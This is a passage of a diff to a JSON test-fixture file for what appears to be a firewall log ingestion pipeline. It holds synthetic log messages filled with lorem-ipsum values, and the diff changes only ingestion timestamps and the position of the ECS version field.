}, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-9 time=5:22:51 logver=eseru devid=remeum devname=orain logid=quip type=oin subtype=uisquam level=high vd=tinvol srcip=10.19.68.92 srcport=1409 srcintf=enp0s33 dstip=10.38.22.45 dstport=7036 dstintf=lo1120 poluuid=ditautfu sessionid=piscing proto=icmp action=accept policyid=ostr trandisp=rudexerc duration=135.013000 sentbyte=3369 rcvdbyte=927 devtype=itaut osname=imaven osversion=1.152 mastersrcmac=umdolo srcmac=01:00:5e:f7:4a:fd crscore=169.252000 craction=tfug crlevel=icab eventtype=mwr user=fugi service=inculpaq hostname=agna7678.internal.host profile=equa reqtype=mexercit url=https://www.example.net/tasuntex/sunt.txt?ume=incidi#picia direction=unknown msg=olupt method=dit cat=sumquiad catdesc=dexeaco device_id=ivelits log_id=moenimi pri=medium userfrom=etdolo adminprof=inv timezone=CEST main_type=ommod trigger_policy=sequatur sub_type=uidolo severity_level=lumquido policy=nihi src=10.114.150.67 src_port=1407 dst=10.76.73.140 dst_port=3075 http_method=uines http_url=nsec http_host=onse http_agent=emips http_session_id=imadmi signature_subclass=ostrume signature_id=6051 srccountry=eataev content_switch_name=liquide server_pool_name=uasia false_positive_mitigation=emp user_name=aperia monitor_status=ofdeFini http_refer=https://example.org/vol/riat.htm?atvol=umiur#imad http_version=msequi dev_id=isnostru threat_weight=iquaUten history_threat_weight=santium threat_level=iciatisu ftp_mode=rehender ftp_cmd=eporroqu cipher_suite=uat msg_id=tem", "event": { - "ingested": "2021-12-09T13:37:31.906819100Z" + "ingested": "2021-12-14T14:43:11.779388719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=suntinc date=2016-4-24 time=12:25:25 log_id=xeac devid=nidolo devname=tatn logid=eli type=nnu subtype=dolo level=low vd=nse srcip=10.202.204.239 srcport=7783 srcintf=lo2857 
dstip=10.147.28.176 dstport=7432 dstintf=enp0s1462 poluuid=mporain sessionid=icons proto=0 action=accept policyid=sequi trandisp=rehend duration=3.138000 sentbyte=6354 rcvdbyte=3605 devtype=numqu osname=qui osversion=1.4059 mastersrcmac=equi srcmac=01:00:5e:68:86:a1 crscore=72.701000 craction=tat crlevel=ipitla eventtype=quae user=maccusa service=uptat hostname=equep5085.mail.domain profile=aqu reqtype=rpo url=https://www.example.org/inesci/serror.html?mqu=apariat#tlabore direction=internal msg=ihilm method=atDu cat=eav catdesc=ionevo device_id=remagn log_id=run pri=very-high userfrom=iamquis adminprof=quirat timezone=CET main_type=ittenbyC trigger_policy=isc sub_type=aturve severity_level=emulla policy=mpori src=10.195.36.51 src_port=3905 dst=10.95.64.124 dst_port=7042 http_method=iadese http_url=nsectet http_host=utla http_agent=utei http_session_id=laborum signature_subclass=tionof signature_id=7613 srccountry=oin content_switch_name=lapari server_pool_name=data false_positive_mitigation=dolor user_name=nnum monitor_status=eritqu http_refer=https://internal.example.net/wri/bor.jpg?hitect=dol#leumiu http_version=namali dev_id=taevit threat_weight=rinrepre history_threat_weight=etconse threat_level=tincu ftp_mode=ari ftp_cmd=exercit cipher_suite=sci msg_id=quamnih", "event": { - "ingested": "2021-12-09T13:37:31.906823100Z" + "ingested": "2021-12-14T14:43:11.779389116Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=occae dtime=2016-05-08 07:27:59.552538723 +0000 UTC devid=ctetura devname=labore vd=texp date=2016-5-8 time=7:27:59 logid=tMalor type=acc subtype=amc level=very-high eventtime=amest logtime=corp srcip=10.176.216.90 srcport=2428 srcintf=eth2591 srcintfrole=dantiumt dstip=10.186.85.3 dstport=5366 dstintf=lo821 dstintfrole=ento poluuid=pic sessionid=evita proto=prm action=allow policyid=duntut policytype=magni crscore=102.339000 craction=uptat crlevel=uam 
appcat=boris service=nti srccountry=abi dstcountry=sectetur trandisp=uioffi tranip=10.114.16.155 tranport=1608 duration=62.941000 sentbyte=5110 rcvdbyte=3818 sentpkt=ipi app=reseos", "event": { - "ingested": "2021-12-09T13:37:31.906828Z" + "ingested": "2021-12-14T14:43:11.779389515Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=mcolab date=2016-5-22 time=2:30:33 log_id=neav devid=oquisqu devname=sperna logid=eabilloi type=estia subtype=tper level=very-high vd=volupt srcip=10.188.169.107 srcport=2138 srcintf=eth6448 dstip=10.214.7.83 dstport=1696 dstintf=lo1616 poluuid=tenatu sessionid=uun proto=HOPOPT action=cancel policyid=ectio trandisp=dutper duration=4.781000 sentbyte=3423 rcvdbyte=3252 devtype=radi osname=gel osversion=1.3917 mastersrcmac=iduntu srcmac=01:00:5e:21:f5:0a crscore=57.435000 craction=uamqu crlevel=lor eventtype=oide user=dolore service=amvolu hostname=eturadi6608.mail.host profile=aera reqtype=ate url=https://api.example.com/nimid/itatione.htm?umwr=oluptate#issus direction=inbound msg=uaUteni method=udantium cat=pre catdesc=xeacom device_id=stlabo log_id=dictasu pri=low userfrom=catc adminprof=nsect timezone=GMT-07:00 main_type=asia trigger_policy=econs sub_type=uir severity_level=dol policy=essecil src=10.23.62.94 src_port=4368 dst=10.61.163.4 dst_port=1232 http_method=luptatem http_url=atem http_host=gnido http_agent=ratvolu http_session_id=olup signature_subclass=numqua signature_id=1411 srccountry=inculpa content_switch_name=abo server_pool_name=veniamqu false_positive_mitigation=nse user_name=non monitor_status=paquioff http_refer=https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema http_version=intocc dev_id=liqu threat_weight=eporr history_threat_weight=xeacomm threat_level=mveleu ftp_mode=nofdeFin ftp_cmd=sequam cipher_suite=temvel msg_id=ris", "event": { - "ingested": "2021-12-09T13:37:31.906833700Z" + "ingested": 
"2021-12-14T14:43:11.779389900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-5 time=9:33:08 logver=nisiuta devid=tvolu devname=ecte logid=tinvolu type=iurer subtype=iciadese level=medium vd=gnaaliq srcip=10.52.135.156 srcport=2660 srcintf=eth4502 dstip=10.133.89.11 dstport=1098 dstintf=lo4901 poluuid=sintoc sessionid=volupt proto=1 action=deny policyid=uiinea trandisp=Utenima duration=111.502000 sentbyte=1871 rcvdbyte=5074 devtype=ptatem osname=Nequepor osversion=1.2580 mastersrcmac=ugiatnu srcmac=01:00:5e:4a:7f:b8 crscore=103.738000 craction=mnisi crlevel=scivelit eventtype=tDuisaut user=oinBC service=quameius hostname=ipsumdol4488.api.localdomain profile=ommodico reqtype=ptas url=https://example.com/tetu/stru.htm?tlabore=Exc#pora direction=unknown msg=uteirure method=nevo cat=ide catdesc=aali device_id=adip log_id=tium pri=very-high userfrom=iusmodi adminprof=uamest timezone=PST main_type=uiac trigger_policy=epte sub_type=idolo severity_level=quinesc policy=madmi src=10.28.76.42 src_port=3427 dst=10.106.31.86 dst_port=4198 http_method=sno http_url=atno http_host=tani http_agent=volu http_session_id=nonn signature_subclass=inventor signature_id=6088 srccountry=autf content_switch_name=quamni server_pool_name=iatisu false_positive_mitigation=sec user_name=cons monitor_status=sBon http_refer=https://www.example.com/tae/ccaec.htm?aperiame=isc#ullamcor http_version=tobea dev_id=tor threat_weight=qui history_threat_weight=ntmollit threat_level=tenatus ftp_mode=cipitlab ftp_cmd=ipsumd cipher_suite=antiu msg_id=uirati", "event": { - "ingested": "2021-12-09T13:37:31.906837800Z" + "ingested": "2021-12-14T14:43:11.779390295Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ersp dtime=2016-06-20 04:35:42.332538723 +0000 UTC devid=tquov devname=diconseq vd=inven date=2016-6-20 
time=4:35:42 logid=osquira type=tes subtype=mquame level=medium eventtime=tnulapa logtime=orain srcip=10.238.164.74 srcport=2201 srcintf=lo4249 srcintfrole=madmi dstip=10.106.162.153 dstport=341 dstintf=lo7114 dstintfrole=amvo poluuid=qui sessionid=tasn proto=1 action=accept policyid=squirati policytype=Sedutp crscore=92.058000 craction=nbyCic crlevel=utlabor appcat=itessequ service=porro srccountry=ine dstcountry=lup trandisp=tatemUt tranip=10.58.214.16 tranport=508 duration=166.566000 sentbyte=2715 rcvdbyte=7130 sentpkt=pici app=abor", "event": { - "ingested": "2021-12-09T13:37:31.906842Z" + "ingested": "2021-12-14T14:43:11.779390685Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tquiin dtime=2016-07-04 11:38:16.592538723 +0000 UTC devid=tse devname=tenimad vd=minimav date=2016-7-4 time=11:38:16 logid=udexerci type=naal subtype=lore level=high eventtime=idolore logtime=pid srcip=10.225.141.20 srcport=2282 srcintf=enp0s4046 srcintfrole=natuse dstip=10.217.150.196 dstport=4639 dstintf=lo2438 dstintfrole=archite poluuid=loreme sessionid=untu proto=6 action=cancel policyid=datatno policytype=siutali crscore=49.988000 craction=usmodte crlevel=msequi appcat=tau service=exercita srccountry=ris dstcountry=eumiu trandisp=orumSe tranip=10.110.31.190 tranport=945 duration=12.946000 sentbyte=248 rcvdbyte=5300 sentpkt=eeufugia app=evit", "event": { - "ingested": "2021-12-09T13:37:31.906874Z" + "ingested": "2021-12-14T14:43:11.779391259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-18 time=6:40:50 devname=molli device_id=velitse log_id=oditem type=generic subtype=gitsedqu pri=very-high devid=oremi devname=mestq logid=temUt type=olor subtype=ineavo level=very-high vd=mquelau srcip=10.168.236.85 srcport=6846 srcintf=eth651 dstip=10.140.113.244 dstport=4374 dstintf=lo4367 
poluuid=fugitsed sessionid=quam proto=tcp action=deny policyid=fugiat trandisp=atisun duration=101.653000 sentbyte=3962 rcvdbyte=7741 devtype=dmin osname=fugi osversion=1.3319 mastersrcmac=inci srcmac=01:00:5e:e6:ad:ae crscore=39.291000 craction=avol crlevel=icero eventtype=xer user=emipsumd service=isisten hostname=cusant4946.www.domain profile=itecto reqtype=reetdol url=https://api.example.com/isnostr/umqu.htm?emquia=inesci#isnisi direction=unknown msg=aquioffi method=tamet cat=quatur catdesc=uisa device_id=eFi log_id=mexe pri=high userfrom=rpori adminprof=ice timezone=GMT+02:00 main_type=entorev trigger_policy=commodo sub_type=conseq severity_level=ame policy=tatn src=10.137.56.173 src_port=3932 dst=10.69.103.176 dst_port=1229 http_method=umdolo http_url=uptate http_host=amc http_agent=cusant http_session_id=orumSe signature_subclass=ratv signature_id=5227 srccountry=dutp content_switch_name=psaquaea server_pool_name=taevita false_positive_mitigation=ameiusm user_name=proide monitor_status=ano http_refer=https://www5.example.org/tvol/velitess.htm?edqui=nre#veli http_version=volupta dev_id=rnatu threat_weight=elitse history_threat_weight=ima threat_level=quasia ftp_mode=adi ftp_cmd=umwrit cipher_suite=uptate msg_id=mac", "event": { - "ingested": "2021-12-09T13:37:31.906881300Z" + "ingested": "2021-12-14T14:43:11.779391724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=dolore devname=\"onsecte\" devid=\"nBCSedut\" vd=ugiat date=2016-8-2 time=1:43:25 logid=onulam type=ate subtype=odoconse level=high eventtime=quatu logtime=veli srcip=10.30.47.165 srcport=631 srcintf=eth267 srcintfrole=sectet dstip=10.5.235.217 dstport=3689 dstintf=lo5047 dstintfrole=pitl poluuid=por sessionid=quidexea proto=tcp action=deny policyid=runtmol policytype=texpli crscore=57.772000 craction=ptass crlevel=rita appcat=esseci service=tametcon srccountry=liqua dstcountry=mvele trandisp=isis 
tranip=10.25.212.118 tranport=1190 duration=179.686000 sentbyte=238 rcvdbyte=7122 sentpkt=dantium app=lor", "event": { - "ingested": "2021-12-09T13:37:31.906888500Z" + "ingested": "2021-12-14T14:43:11.779392116Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-16 time=8:45:59 logver=onemulla devid=dolorem devname=tvolu logid=nreprehe type=tetu subtype=mdol level=high vd=nby srcip=10.20.26.210 srcport=2791 srcintf=eth5968 dstip=10.85.96.153 dstport=5286 dstintf=eth4392 poluuid=nsequat sessionid=doloreme proto=0 action=deny policyid=reprehe trandisp=tincu duration=93.111000 sentbyte=2826 rcvdbyte=6247 devtype=lor osname=oraincid osversion=1.225 mastersrcmac=emeumfug srcmac=01:00:5e:1d:39:39 crscore=114.626000 craction=liqua crlevel=olo eventtype=psumqu user=untincul service=iduntu hostname=ccaeca5504.internal.example profile=reseo reqtype=oreetd url=https://example.org/tiaec/rumwrit.txt?oconsequ=edquiac#urerepr direction=external msg=ercit method=etMal cat=qua catdesc=rsita device_id=ate log_id=ipsamvo pri=low userfrom=adeseru adminprof=tdol timezone=CET main_type=rem trigger_policy=asper sub_type=idunt severity_level=luptat policy=eveli src=10.149.13.76 src_port=7809 dst=10.40.152.253 dst_port=1478 http_method=ritt http_url=iaeco http_host=equaturv http_agent=siu http_session_id=snost signature_subclass=tpersp signature_id=2624 srccountry=quaea content_switch_name=ametcons server_pool_name=utali false_positive_mitigation=porinc user_name=tetur monitor_status=xce http_refer=https://example.com/aincidu/nimadmin.jpg?itinv=eumfugi#etdolor http_version=lupta dev_id=xeaco threat_weight=nvolupt history_threat_weight=oremi threat_level=elites ftp_mode=nbyCi ftp_cmd=tevel cipher_suite=usc msg_id=rem", "event": { - "ingested": "2021-12-09T13:37:31.906893800Z" + "ingested": "2021-12-14T14:43:11.779392501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=cab dtime=2016-08-30 15:48:33.632538723 +0000 UTC devid=atisund devname=xea vd=ites date=2016-8-30 time=3:48:33 logid=isetq type=iutali subtype=velite level=high eventtime=avolupt logtime=ariatur srcip=10.98.194.212 srcport=5469 srcintf=lo1208 srcintfrole=atisetqu dstip=10.51.213.42 dstport=988 dstintf=enp0s3449 dstintfrole=ilmol poluuid=eri sessionid=quunt proto=HOPOPT action=deny policyid=mquae policytype=eriti crscore=96.729000 craction=cidunt crlevel=plica appcat=ore service=quidolor srccountry=inven dstcountry=eufugi trandisp=accusant tranip=10.233.120.207 tranport=136 duration=171.844000 sentbyte=2859 rcvdbyte=4844 sentpkt=eaqu app=nvol", "event": { - "ingested": "2021-12-09T13:37:31.906899600Z" + "ingested": "2021-12-14T14:43:11.779392889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=leumiu devname=\"tla\" devid=\"item\" vd=nimid date=2016-9-13 time=10:51:07 logid=dat type=periam subtype=dqu level=high eventtime=dminima logtime=dutpers srcip=10.245.187.229 srcport=4953 srcintf=lo3642 srcintfrole=prehen dstip=10.67.132.242 dstport=2340 dstintf=enp0s2700 dstintfrole=sequa poluuid=iosamnis sessionid=volupt proto=6 action=allow policyid=idid policytype=tesse crscore=64.509000 craction=boru crlevel=ptateve appcat=enderi service=ptatem srccountry=ptatevel dstcountry=tenatuse trandisp=psaqua tranip=10.241.132.176 tranport=7224 duration=167.705000 sentbyte=6595 rcvdbyte=7301 sentpkt=tame app=atione", "event": { - "ingested": "2021-12-09T13:37:31.906905600Z" + "ingested": "2021-12-14T14:43:11.779393386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-28 time=5:53:42 logver=vitaedic devid=orin devname=uii logid=estl type=sitam subtype=orem level=very-high vd=uuntur srcip=10.210.28.247 
srcport=3449 srcintf=eth4185 dstip=10.237.180.17 dstport=3023 dstintf=lo7672 poluuid=tate sessionid=onevo proto=6 action=allow policyid=aeconseq trandisp=lor duration=96.560000 sentbyte=2760 rcvdbyte=1775 devtype=emqu osname=riss osversion=1.1847 mastersrcmac=sitvol srcmac=01:00:5e:a5:5a:54 crscore=129.120000 craction=olorsi crlevel=aliq eventtype=mes user=mven service=olorsit hostname=tore7088.www.invalid profile=ruredo reqtype=mac url=https://mail.example.org/ptassita/its.gif?risnis=uov#itlab direction=outbound msg=sBono method=loremqu cat=tetur catdesc=amvo device_id=siuta log_id=urmagn pri=low userfrom=uptat adminprof=idex timezone=GMT+02:00 main_type=tatione trigger_policy=nimveni sub_type=idi severity_level=ore policy=quid src=10.212.214.4 src_port=6040 dst=10.199.47.220 dst_port=4084 http_method=oin http_url=hil http_host=cingel http_agent=modocon http_session_id=ipsu signature_subclass=ntNeq signature_id=1081 srccountry=aUt content_switch_name=boNem server_pool_name=nturm false_positive_mitigation=emips user_name=atv monitor_status=onu http_refer=https://www5.example.net/alorum/obeataev.gif?atDu=nsec#quidolor http_version=oqu dev_id=naaliq threat_weight=remeu history_threat_weight=osquir threat_level=mod ftp_mode=col ftp_cmd=mve cipher_suite=liquide msg_id=odt", "event": { - "ingested": "2021-12-09T13:37:31.906911400Z" + "ingested": "2021-12-14T14:43:11.779393771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-10-12 time=12:56:16 logver=inv devid=rroq devname=rcit logid=aecatcup type=olabor subtype=estl level=very-high vd=citatio srcip=10.168.40.197 srcport=7699 srcintf=enp0s3071 dstip=10.206.69.135 dstport=6396 dstintf=eth3862 poluuid=utfug sessionid=aturQu proto=udp action=deny policyid=mipsamvo trandisp=eiusmod duration=91.147000 sentbyte=6153 rcvdbyte=4059 devtype=oreveri osname=ehende osversion=1.760 mastersrcmac=Except srcmac=01:00:5e:bf:07:ee 
crscore=45.760000 craction=dol crlevel=sciun eventtype=metcons user=itasper service=uae hostname=mve1890.internal.home profile=tatemU reqtype=mad url=https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut direction=unknown msg=dexerc method=strumex cat=eprehend catdesc=asnu device_id=hitec log_id=henderit pri=medium userfrom=perspici adminprof=ationul timezone=PST main_type=itsedq trigger_policy=uto sub_type=emUte severity_level=molestia policy=quir src=10.46.56.204 src_port=2463 dst=10.234.165.130 dst_port=7079 http_method=umf http_url=quames http_host=dolorsit http_agent=archite http_session_id=remq signature_subclass=veniamq signature_id=1236 srccountry=uta content_switch_name=emo server_pool_name=itq false_positive_mitigation=derit user_name=orese monitor_status=dolor http_refer=https://mail.example.com/ntexpl/dunt.jpg?yCic=nder#mdolore http_version=Cic dev_id=olorema threat_weight=mollita history_threat_weight=tatem threat_level=iae ftp_mode=quido ftp_cmd=emip cipher_suite=inBC msg_id=mol", "event": { - "ingested": "2021-12-09T13:37:31.906917200Z" + "ingested": "2021-12-14T14:43:11.779394327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=turadipi date=2016-10-26 time=7:58:50 log_id=usmodi devid=ree devname=saquaea logid=ation type=luptas subtype=minim level=very-high vd=lorsi srcip=10.61.123.159 srcport=754 srcintf=eth7713 dstip=10.141.158.225 dstport=4690 dstintf=lo1586 poluuid=ate sessionid=idolor proto=1 action=block policyid=nreprehe trandisp=onse duration=71.505000 sentbyte=4010 rcvdbyte=4527 devtype=duntutla osname=ntium osversion=1.4450 mastersrcmac=asuntexp srcmac=01:00:5e:26:56:73 crscore=5.843000 craction=nse crlevel=modoc eventtype=boNem user=iumt service=tsed hostname=eturad6143.www.home profile=uamnihil reqtype=llam url=https://example.net/aparia/tatnon.jpg?rever=ore#offici direction=outbound msg=metco method=acom cat=ceroinB catdesc=nim 
device_id=utaliqu log_id=rsi pri=high userfrom=imadmi adminprof=isnis timezone=CEST main_type=olupta trigger_policy=tsuntinc sub_type=inrepreh severity_level=quovo policy=urExcep src=10.128.46.70 src_port=5269 dst=10.95.117.134 dst_port=1723 http_method=acommodi http_url=essecill http_host=billoi http_agent=moles http_session_id=dipiscin signature_subclass=olup signature_id=5976 srccountry=undeomni content_switch_name=accusa server_pool_name=natu false_positive_mitigation=liquid user_name=enim monitor_status=Finibus http_refer=https://www.example.org/xeacom/des.gif?umdolo=ntiu#radipisc http_version=Cice dev_id=taedi threat_weight=tquido history_threat_weight=ptasnula threat_level=oru ftp_mode=ill ftp_cmd=mporinc cipher_suite=onsectet msg_id=idolo", "event": { - "ingested": "2021-12-09T13:37:31.906923Z" + "ingested": "2021-12-14T14:43:11.779396210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-10 time=3:01:24 logver=edolo devid=ugiatquo devname=ntium logid=uptate type=lloinven subtype=econs level=medium vd=tetura srcip=10.135.106.42 srcport=6602 srcintf=lo154 dstip=10.224.30.160 dstport=5302 dstintf=eth1247 poluuid=etconsec sessionid=caboNem proto=21 action=cancel policyid=rumetMal trandisp=oconse duration=2.970000 sentbyte=7685 rcvdbyte=1506 devtype=sequam osname=oditempo osversion=1.7544 mastersrcmac=taliqui srcmac=01:00:5e:98:79:a3 crscore=78.248000 craction=rcitat crlevel=dolorema eventtype=emagn user=radipis service=ctetu hostname=orinrep5386.www.corp profile=stenatus reqtype=equep url=https://www.example.com/tali/BCS.txt?iqu=niamqu#equamnih direction=inbound msg=autemv method=emq cat=plicaboN catdesc=amc device_id=vol log_id=admi pri=medium userfrom=culpaq adminprof=saute timezone=GMT+02:00 main_type=ende trigger_policy=abor sub_type=magnid severity_level=adol policy=iutal src=10.208.21.135 src_port=2721 dst=10.253.228.140 dst_port=6748 http_method=ugitse 
http_url=quiineav http_host=billoinv http_agent=sci http_session_id=col signature_subclass=obea signature_id=5700 srccountry=tatev content_switch_name=luptas server_pool_name=uptatem false_positive_mitigation=oinv user_name=inculp monitor_status=onofd http_refer=https://internal.example.org/nisiu/imad.html?ptatem=itasp#dexe http_version=tat dev_id=onproide threat_weight=ntmo history_threat_weight=loreeu threat_level=temse ftp_mode=aspernat ftp_cmd=ume cipher_suite=caecat msg_id=rautod", "event": { - "ingested": "2021-12-09T13:37:31.906928700Z" + "ingested": "2021-12-14T14:43:11.779396746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ercitat date=2016-11-24 time=10:03:59 log_id=lapar devid=ritati devname=edquia logid=itesse type=mullam subtype=mexerc level=medium vd=amvolu srcip=10.120.231.161 srcport=1129 srcintf=lo653 dstip=10.210.62.203 dstport=4381 dstintf=lo3057 poluuid=ataevita sessionid=oremqu proto=6 action=cancel policyid=velitsed trandisp=magnaali duration=92.900000 sentbyte=3984 rcvdbyte=4009 devtype=ulla osname=equatDu osversion=1.1710 mastersrcmac=aconse srcmac=01:00:5e:92:c2:23 crscore=20.350000 craction=squira crlevel=aliqui eventtype=ess user=uide service=scivel hostname=henderi724.www5.home profile=tquas reqtype=aquio url=https://www.example.com/iame/orroquis.htm?tiumd=ntmoll#mexer direction=internal msg=isnostru method=nofdeFi cat=aquioff catdesc=saqu device_id=remips log_id=illoi pri=medium userfrom=abori adminprof=uisnostr timezone=GMT+02:00 main_type=ilmole trigger_policy=ugi sub_type=niamquis severity_level=nisi policy=emveleum src=10.243.226.122 src_port=3512 dst=10.3.23.172 dst_port=7332 http_method=emullamc http_url=tec http_host=Nemo http_agent=tutlabo http_session_id=mveleum signature_subclass=liq signature_id=7229 srccountry=sBonorum content_switch_name=atems server_pool_name=quira false_positive_mitigation=tassita user_name=olorem 
monitor_status=sedquiac http_refer=https://www.example.com/atDuis/asnulapa.html?rumwri=velill#ore http_version=tation dev_id=loinve threat_weight=tatevel history_threat_weight=iumdolo threat_level=untu ftp_mode=ict ftp_cmd=squirati cipher_suite=tem msg_id=mestq", "event": { - "ingested": "2021-12-09T13:37:31.906934400Z" + "ingested": "2021-12-14T14:43:11.779397457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=luptate date=2016-12-8 time=5:06:33 log_id=llamc devid=eleumiu devname=uei logid=Nequepo type=radipis subtype=cive level=low vd=orumSec srcip=10.56.74.7 srcport=6149 srcintf=eth2940 dstip=10.73.10.215 dstport=2079 dstintf=lo3472 poluuid=oeni sessionid=untutlab proto=0 action=cancel policyid=consecte trandisp=pteurs duration=26.872000 sentbyte=617 rcvdbyte=1651 devtype=ons osname=tiaecon osversion=1.5380 mastersrcmac=unt srcmac=01:00:5e:99:7b:4a crscore=124.392000 craction=queporro crlevel=uid eventtype=snostrum user=psa service=nculpaq hostname=reseosqu1629.mail.lan profile=utemvel reqtype=epteur url=https://www.example.net/iame/laudanti.htm?stquido=rsitvolu#mnisi direction=external msg=uameiusm method=adm cat=gelitsed catdesc=tiumto device_id=cor log_id=odoco pri=high userfrom=labore adminprof=ianonnu timezone=PST main_type=rum trigger_policy=erc sub_type=ehende severity_level=tutla policy=licaboNe src=10.94.242.80 src_port=2724 dst=10.106.85.174 dst_port=307 http_method=atiset http_url=serror http_host=onse http_agent=umquam http_session_id=emagn signature_subclass=emulla signature_id=1963 srccountry=iquaUt content_switch_name=mnihilm server_pool_name=redo false_positive_mitigation=etMaloru user_name=lmo monitor_status=iquidex http_refer=https://www.example.org/remipsu/tan.html?mcorpor=doconse#etdol http_version=dolorsi dev_id=nturmag threat_weight=tura history_threat_weight=osquirat threat_level=equat ftp_mode=aliquid ftp_cmd=usantiu cipher_suite=idunt 
msg_id=atqu", "event": { - "ingested": "2021-12-09T13:37:31.906940200Z" + "ingested": "2021-12-14T14:43:11.779397847Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=liquam dtime=2016-12-23 00:09:07.712538723 +0000 UTC devid=min devname=oluptat vd=odt date=2016-12-23 time=12:09:07 logid=rspici type=snisi subtype=magnaal level=low eventtime=etquasia logtime=nula srcip=10.117.63.181 srcport=5299 srcintf=lo7416 srcintfrole=Cicero dstip=10.247.53.179 dstport=6493 dstintf=lo3706 dstintfrole=atemaccu poluuid=veritat sessionid=aliquipe proto=3 action=block policyid=aer policytype=osquira crscore=171.144000 craction=minim crlevel=scipi appcat=tur service=acon srccountry=Nemoenim dstcountry=usm trandisp=labori tranip=10.168.20.20 tranport=68 duration=167.038000 sentbyte=7188 rcvdbyte=5749 sentpkt=xeac app=umdolors", "event": { - "ingested": "2021-12-09T13:37:31.906944300Z" + "ingested": "2021-12-14T14:43:11.779398393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=uiadolo date=2017-1-6 time=7:11:41 log_id=empor devid=umexerci devname=duntut logid=uovol type=prehend subtype=eufug level=low vd=eufug srcip=10.100.53.8 srcport=4318 srcintf=eth5767 dstip=10.163.17.172 dstport=854 dstintf=enp0s3903 poluuid=upta sessionid=atc proto=3 action=block policyid=upta trandisp=itessequ duration=165.935000 sentbyte=4211 rcvdbyte=405 devtype=exerci osname=idata osversion=1.2208 mastersrcmac=usmod srcmac=01:00:5e:c0:47:f3 crscore=135.374000 craction=isiutali crlevel=iquidexe eventtype=illumq user=luptatem service=ite hostname=tasnul4179.internal.host profile=amvo reqtype=tnul url=https://www.example.org/ess/quiad.jpg?ten=litanim#rQuisaut direction=inbound msg=modico method=metco cat=cillu catdesc=iuntNeq device_id=eddoei log_id=rsin pri=very-high userfrom=eriam adminprof=pernat timezone=CEST main_type=imve 
trigger_policy=essequam sub_type=ueporro severity_level=aliqu policy=upt src=10.141.156.217 src_port=2700 dst=10.53.168.187 dst_port=73 http_method=emacc http_url=emp http_host=lamcola http_agent=veli http_session_id=venia signature_subclass=risni signature_id=1535 srccountry=uat content_switch_name=onemulla server_pool_name=riaturEx false_positive_mitigation=deri user_name=amqu monitor_status=lorsitam http_refer=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip http_version=upta dev_id=tetura threat_weight=rumet history_threat_weight=uptasnul threat_level=antiumdo ftp_mode=ecill ftp_cmd=iduntu cipher_suite=pisci msg_id=sunt", "event": { - "ingested": "2021-12-09T13:37:31.906948900Z" + "ingested": "2021-12-14T14:43:11.779398779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-20 time=2:14:16 devname=oco device_id=aboree log_id=ainci type=generic subtype=osqu pri=very-high devid=sus devname=imavenia logid=expli type=ugiat subtype=rnat level=low vd=orem srcip=10.37.174.58 srcport=3193 srcintf=lo2990 dstip=10.249.60.66 dstport=4859 dstintf=enp0s1732 poluuid=eve sessionid=tco proto=3 action=accept policyid=oluptate trandisp=lit duration=70.988000 sentbyte=6327 rcvdbyte=837 devtype=oquisqu osname=turadip osversion=1.3402 mastersrcmac=amc srcmac=01:00:5e:dd:dc:44 crscore=160.379000 craction=apar crlevel=runtm eventtype=eturadip user=olorsi service=itseddo hostname=bore5546.www.local profile=labo reqtype=lpaquiof url=https://example.com/xeac/llitanim.txt?oreverit=scip#Finibus direction=inbound msg=eufugia method=ncididun cat=hen catdesc=periamea device_id=itametco log_id=vel pri=high userfrom=rere adminprof=pta timezone=CEST main_type=equeporr trigger_policy=met sub_type=volup 